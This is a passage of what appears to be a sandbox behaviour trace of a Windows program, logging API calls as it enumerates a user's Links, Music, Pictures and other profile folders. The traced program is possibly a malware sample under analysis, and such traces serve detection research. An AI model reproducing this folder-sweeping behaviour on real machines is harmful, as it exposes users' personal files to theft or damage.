cAlternateFileName="MICROS~1")) returned 1 [0091.017] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0091.017] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0091.017] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df2b0 [0091.017] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Websites", cAlternateFileName="MSNWEB~1")) returned 1 [0091.017] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x31621a8 [0091.017] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x3161c80 [0091.017] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x214) returned 0x3165e90 [0091.017] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0091.017] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dab0 [0091.017] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 1 [0091.017] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 0 [0091.017] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0091.018] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0091.018] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="Links\\" [0091.018] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0091.018] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0091.018] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0091.018] PathFindFileNameW (pszPath="") returned="" [0091.018] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0091.018] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0091.018] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0091.018] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0091.018] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x3a1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1 [0091.018] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 1 [0091.018] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0 [0091.018] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0091.019] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0091.019] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\") returned="Local Settings\\" [0091.019] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0091.019] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0091.019] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0091.019] PathFindFileNameW (pszPath="") returned="" [0091.019] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0xffffffff [0091.019] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0091.019] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0091.019] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0091.019] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0091.019] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0091.019] PathFindFileNameW (pszPath="") returned="" [0091.019] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x9f9d33b0, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0x9f9d33b0, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0091.020] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x9f9d33b0, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0x9f9d33b0, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0091.020] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe82b8080, ftCreationTime.dwHighDateTime=0x1d5b8c9, ftLastAccessTime.dwLowDateTime=0x2e4d3710, ftLastAccessTime.dwHighDateTime=0x1d5bff6, ftLastWriteTime.dwLowDateTime=0x2e4d3710, ftLastWriteTime.dwHighDateTime=0x1d5bff6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="44M5AK", cAlternateFileName="")) returned 1 [0091.020] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b608530, ftCreationTime.dwHighDateTime=0x1d5c244, ftLastAccessTime.dwLowDateTime=0x451924f0, ftLastAccessTime.dwHighDateTime=0x1d5c30b, ftLastWriteTime.dwLowDateTime=0x451924f0, ftLastWriteTime.dwHighDateTime=0x1d5c30b, nFileSizeHigh=0x0, nFileSizeLow=0x16d19, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7bJ1P.m4a", cAlternateFileName="")) returned 1 [0091.020] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0091.020] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4595ae0, ftCreationTime.dwHighDateTime=0x1d5c296, ftLastAccessTime.dwLowDateTime=0x42e43ce0, ftLastAccessTime.dwHighDateTime=0x1d5baa2, ftLastWriteTime.dwLowDateTime=0x42e43ce0, ftLastWriteTime.dwHighDateTime=0x1d5baa2, nFileSizeHigh=0x0, nFileSizeLow=0xff29, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FM IT1z0r5x6P3.m4a", cAlternateFileName="FMIT1Z~1.M4A")) returned 1 [0091.020] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xda9d09a0, ftCreationTime.dwHighDateTime=0x1d5c24e, ftLastAccessTime.dwLowDateTime=0x459b79e0, ftLastAccessTime.dwHighDateTime=0x1d5c0d2, ftLastWriteTime.dwLowDateTime=0x459b79e0, ftLastWriteTime.dwHighDateTime=0x1d5c0d2, nFileSizeHigh=0x0, nFileSizeLow=0xf8bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="H4JY_jz9eXsr.mp3", cAlternateFileName="H4JY_J~1.MP3")) returned 1 [0091.020] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xda9d09a0, ftCreationTime.dwHighDateTime=0x1d5c24e, ftLastAccessTime.dwLowDateTime=0x459b79e0, ftLastAccessTime.dwHighDateTime=0x1d5c0d2, ftLastWriteTime.dwLowDateTime=0x459b79e0, ftLastWriteTime.dwHighDateTime=0x1d5c0d2, nFileSizeHigh=0x0, nFileSizeLow=0xf8bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="H4JY_jz9eXsr.mp3", cAlternateFileName="H4JY_J~1.MP3")) returned 0 [0091.020] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0091.020] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0091.020] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\") returned="My Documents\\" [0091.020] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0091.020] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0091.020] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0091.020] PathFindFileNameW (pszPath="") returned="" [0091.020] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xda9d09a0, ftCreationTime.dwHighDateTime=0x1d5c24e, ftLastAccessTime.dwLowDateTime=0x459b79e0, ftLastAccessTime.dwHighDateTime=0x1d5c0d2, ftLastWriteTime.dwLowDateTime=0x459b79e0, ftLastWriteTime.dwHighDateTime=0x1d5c0d2, nFileSizeHigh=0x0, nFileSizeLow=0xf8bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="H4JY_jz9eXsr.mp3", cAlternateFileName="H4JY_J~1.MP3")) returned 0xffffffff [0091.021] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0091.021] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\") returned="NetHood\\" [0091.021] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0091.021] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0091.021] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0091.021] PathFindFileNameW (pszPath="") returned="" [0091.021] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xda9d09a0, ftCreationTime.dwHighDateTime=0x1d5c24e, ftLastAccessTime.dwLowDateTime=0x459b79e0, ftLastAccessTime.dwHighDateTime=0x1d5c0d2, ftLastWriteTime.dwLowDateTime=0x459b79e0, ftLastWriteTime.dwHighDateTime=0x1d5c0d2, nFileSizeHigh=0x0, nFileSizeLow=0xf8bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="H4JY_jz9eXsr.mp3", cAlternateFileName="H4JY_J~1.MP3")) returned 0xffffffff [0091.021] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0091.021] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0091.021] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0091.021] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0091.021] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0091.021] PathFindFileNameW (pszPath="") returned="" [0091.021] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x9fca6dd0, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0x9fca6dd0, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0091.022] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x9fca6dd0, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0x9fca6dd0, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0091.022] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22d80350, ftCreationTime.dwHighDateTime=0x1d5bef3, ftLastAccessTime.dwLowDateTime=0xbe4d7e90, ftLastAccessTime.dwHighDateTime=0x1d5bd0a, ftLastWriteTime.dwLowDateTime=0xbe4d7e90, ftLastWriteTime.dwHighDateTime=0x1d5bd0a, nFileSizeHigh=0x0, nFileSizeLow=0x183c2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2g0XsPiX_C7i.bmp", cAlternateFileName="2G0XSP~1.BMP")) returned 1 [0091.022] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8cbea140, ftCreationTime.dwHighDateTime=0x1d5c595, ftLastAccessTime.dwLowDateTime=0x3d7e5560, ftLastAccessTime.dwHighDateTime=0x1d5bf0c, ftLastWriteTime.dwLowDateTime=0x3d7e5560, ftLastWriteTime.dwHighDateTime=0x1d5bf0c, nFileSizeHigh=0x0, nFileSizeLow=0x24ee, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3C_zMbuR.jpg", cAlternateFileName="")) returned 1 [0091.022] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x48f02260, ftCreationTime.dwHighDateTime=0x1d5c520, ftLastAccessTime.dwLowDateTime=0x2dc78090, ftLastAccessTime.dwHighDateTime=0x1d5b617, ftLastWriteTime.dwLowDateTime=0x2dc78090, ftLastWriteTime.dwHighDateTime=0x1d5b617, nFileSizeHigh=0x0, nFileSizeLow=0x26af, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3fba8e.png", cAlternateFileName="")) returned 1 [0091.022] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe70fdee0, ftCreationTime.dwHighDateTime=0x1d5c2af, ftLastAccessTime.dwLowDateTime=0xee6ed670, ftLastAccessTime.dwHighDateTime=0x1d5b722, ftLastWriteTime.dwLowDateTime=0xee6ed670, ftLastWriteTime.dwHighDateTime=0x1d5b722, nFileSizeHigh=0x0, nFileSizeLow=0x12c7e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8Rw8e.bmp", cAlternateFileName="")) returned 1 [0091.022] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7656a30, ftCreationTime.dwHighDateTime=0x1d5c28e, ftLastAccessTime.dwLowDateTime=0xa3c5a3d0, ftLastAccessTime.dwHighDateTime=0x1d5c4ae, ftLastWriteTime.dwLowDateTime=0xa3c5a3d0, ftLastWriteTime.dwHighDateTime=0x1d5c4ae, nFileSizeHigh=0x0, nFileSizeLow=0x8603, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="aji-jvy.png", cAlternateFileName="")) returned 1 [0091.022] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f1d260, ftCreationTime.dwHighDateTime=0x1d5b683, ftLastAccessTime.dwLowDateTime=0xf2a93340, ftLastAccessTime.dwHighDateTime=0x1d5b7bb, ftLastWriteTime.dwLowDateTime=0xf2a93340, ftLastWriteTime.dwHighDateTime=0x1d5b7bb, nFileSizeHigh=0x0, nFileSizeLow=0xd5f3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CBFd5Z-W.gif", cAlternateFileName="")) returned 1 [0091.022] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95032b30, ftCreationTime.dwHighDateTime=0x1d5b705, ftLastAccessTime.dwLowDateTime=0x9361f0c0, ftLastAccessTime.dwHighDateTime=0x1d5c0e9, ftLastWriteTime.dwLowDateTime=0x9361f0c0, ftLastWriteTime.dwHighDateTime=0x1d5c0e9, nFileSizeHigh=0x0, nFileSizeLow=0x11b46, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CiJEW.jpg", cAlternateFileName="")) returned 1 [0091.022] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16292d30, ftCreationTime.dwHighDateTime=0x1d5c058, ftLastAccessTime.dwLowDateTime=0x5bdf9ca0, ftLastAccessTime.dwHighDateTime=0x1d5b8cf, ftLastWriteTime.dwLowDateTime=0x5bdf9ca0, ftLastWriteTime.dwHighDateTime=0x1d5b8cf, nFileSizeHigh=0x0, nFileSizeLow=0xd347, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cmf8FY.jpg", cAlternateFileName="")) returned 1 [0091.022] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0091.022] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb73f55a0, ftCreationTime.dwHighDateTime=0x1d5be50, ftLastAccessTime.dwLowDateTime=0xb85a9130, ftLastAccessTime.dwHighDateTime=0x1d5bc01, ftLastWriteTime.dwLowDateTime=0xb85a9130, ftLastWriteTime.dwHighDateTime=0x1d5bc01, nFileSizeHigh=0x0, nFileSizeLow=0x96ae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dQ6AzVpOnvDz9H9B3b_.png", cAlternateFileName="DQ6AZV~1.PNG")) returned 1 [0091.022] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x212a7180, ftCreationTime.dwHighDateTime=0x1d5c03f, ftLastAccessTime.dwLowDateTime=0x840be040, ftLastAccessTime.dwHighDateTime=0x1d5c2ce, ftLastWriteTime.dwLowDateTime=0x840be040, ftLastWriteTime.dwHighDateTime=0x1d5c2ce, nFileSizeHigh=0x0, nFileSizeLow=0xe1dd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="E1i4o8lCxx-bef.gif", cAlternateFileName="E1I4O8~1.GIF")) returned 1 [0091.022] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x706a3900, ftCreationTime.dwHighDateTime=0x1d5bd84, ftLastAccessTime.dwLowDateTime=0x945d2e00, ftLastAccessTime.dwHighDateTime=0x1d5c539, ftLastWriteTime.dwLowDateTime=0x945d2e00, ftLastWriteTime.dwHighDateTime=0x1d5c539, nFileSizeHigh=0x0, nFileSizeLow=0x18c47, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eAID79ide.jpg", cAlternateFileName="EAID79~1.JPG")) returned 1 [0091.022] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb8eb340, ftCreationTime.dwHighDateTime=0x1d5c044, ftLastAccessTime.dwLowDateTime=0x7e76fca0, ftLastAccessTime.dwHighDateTime=0x1d5bbcb, ftLastWriteTime.dwLowDateTime=0x7e76fca0, ftLastWriteTime.dwHighDateTime=0x1d5bbcb, nFileSizeHigh=0x0, nFileSizeLow=0xfe99, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="i0_91MD8mP.gif", cAlternateFileName="I0_91M~1.GIF")) returned 1 [0091.022] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfeef2810, 